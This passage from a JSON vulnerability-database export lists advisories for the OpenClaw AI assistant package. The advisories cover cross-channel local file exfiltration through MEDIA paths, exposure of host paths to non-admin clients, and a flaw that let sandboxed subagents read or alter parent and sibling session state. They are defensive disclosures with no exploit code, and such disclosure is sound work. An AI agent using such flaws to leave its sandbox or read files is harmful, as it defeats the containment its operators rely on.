issue.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/5f5b3d733bdd791cb457f838514179e1288b10b3","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/5f5b3d733bdd791cb457f838514179e1288b10b3"},{"reference_url":"https://github.com/openclaw/openclaw/pull/63226","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/63226"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qmwg-qprg-3j38","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring
_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qmwg-qprg-3j38"},{"reference_url":"https://github.com/advisories/GHSA-qmwg-qprg-3j38","reference_id":"GHSA-qmwg-qprg-3j38","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qmwg-qprg-3j38"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110121?format=json","purl":"pkg:npm/openclaw@2026.4.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-k8x3-9pv7-rfax"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulner
ability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rvcq-rqbq-4khp"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.9"}],"aliases":["GHSA-qmwg-qprg-3j38"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w2tj-nqa6-cuam"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89467?format=json","vulnerability_id":"VCID-w4p1-sxdg-hyha","summary":"OpenClaw: Shared reply MEDIA - paths are treated as trusted and can trigger cross-channel local file exfiltration\n## Impact\n\nShared reply MEDIA: paths are treated as trusted and can trigger cross-channel local file exfiltration.\n\nA crafted shared reply MEDIA reference could cause another channel to read a local file path as trusted generated media.\n\nOpenClaw is a user-controlled local assistant. 
This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.4.4`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @threalwinky for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42424","reference_id":"","reference_type":"","scores":[{"value":"0.00029","scoring_system":"epss","scoring_elements":"0.0867","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00029","scoring_system":"epss","scoring_elements":"0.0869","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00029","scoring_system":"epss","scoring_elements":"0.08675","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42424"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"
5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:12:58Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qqq7-4hxc-x63c","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:12:58Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qqq7-4hxc-x63c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42424","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42424"
},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-local-file-exfiltration-via-shared-reply-media-paths","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:12:58Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-local-file-exfiltration-via-shared-reply-media-paths"},{"reference_url":"https://github.com/advisories/GHSA-qqq7-4hxc-x63c","reference_id":"GHSA-qqq7-4hxc-x63c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qqq7-4hxc-x63c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{
"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42424","GHSA-qqq7-4hxc-x63c"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6
.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w4p1-sxdg-hyha"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89489?format=json","vulnerability_id":"VCID-w58d-6veg-uugy","summary":"OpenClaw: Gateway hello snapshots exposed host config and state paths to non-admin clients\n## Summary\n\nBefore OpenClaw 2026.4.2, the Gateway `connect` success snapshot exposed local `configPath` and `stateDir` metadata to non-admin clients. Low-privilege authenticated clients could learn host filesystem layout and deployment details that were not needed for their role.\n\n## Impact\n\nA non-admin client could recover host-specific filesystem paths and related deployment metadata, aiding host fingerprinting and chained attacks. This was an information-disclosure issue, not a direct authorization bypass.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `676b748056b5efca6f1255708e9dd9469edf5e2e` — limit connect snapshot metadata to admin-scoped clients\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. 
Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @topsec-bunney for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41339","reference_id":"","reference_type":"","scores":[{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11323","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11356","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11364","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41339"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/676b748056b5efca6f1255708e9dd9469edf5e2e","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:34:47Z/"}],"url":"https://github.com/openclaw/openclaw/commit/676b748056b5efca6f1255708e9dd9469edf5e2e"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2f7j-rp58-mr42","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1
/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:34:47Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2f7j-rp58-mr42"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41339","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41339"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-information-disclosure-via-gateway-connect-snapshot","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:34:47Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-information-disclosure-via-gateway-connect-snapshot"},{"reference_url":"https://github.com/advisories/GHSA-2f7j-rp58-mr42","reference_id":"GHSA-2f7j-rp58-mr42","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2f7j-rp58-mr42"}],"fixed_p
ackages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4
wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-41339","GHSA-2f7j-rp58-mr42"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-w58d-6veg-uugy"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90824?format=json","vulnerability_id":"VCID-w8sb-7ymy-wkez","summary":"OpenClaw: `session_status` let sandboxed subagents access parent or sibling session state\n### Summary\n\nThe built-in `session_status` tool did not enforce the intended session-visibility boundary. 
A sandboxed subagent could supply another session's `sessionKey` and inspect or modify state outside its own sandbox scope.\n\n### Impact\n\nThis allowed a sandboxed child session to read parent or sibling session data and, in affected releases, update the target session's persisted model override.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.8`\n\n### Patch\n\nFixed in `openclaw` `2026.3.11` and included in later releases such as `2026.3.12`. Session visibility checks now enforce the sandbox boundary before reading or mutating session state.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32918","reference_id":"","reference_type":"","scores":[{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04354","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04364","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04375","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32918"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wcxr-59v9-rxr8","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring
_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-30T14:13:12Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wcxr-59v9-rxr8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32918","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32918"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-session-sandbox-escape-via-session-status-tool","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","sco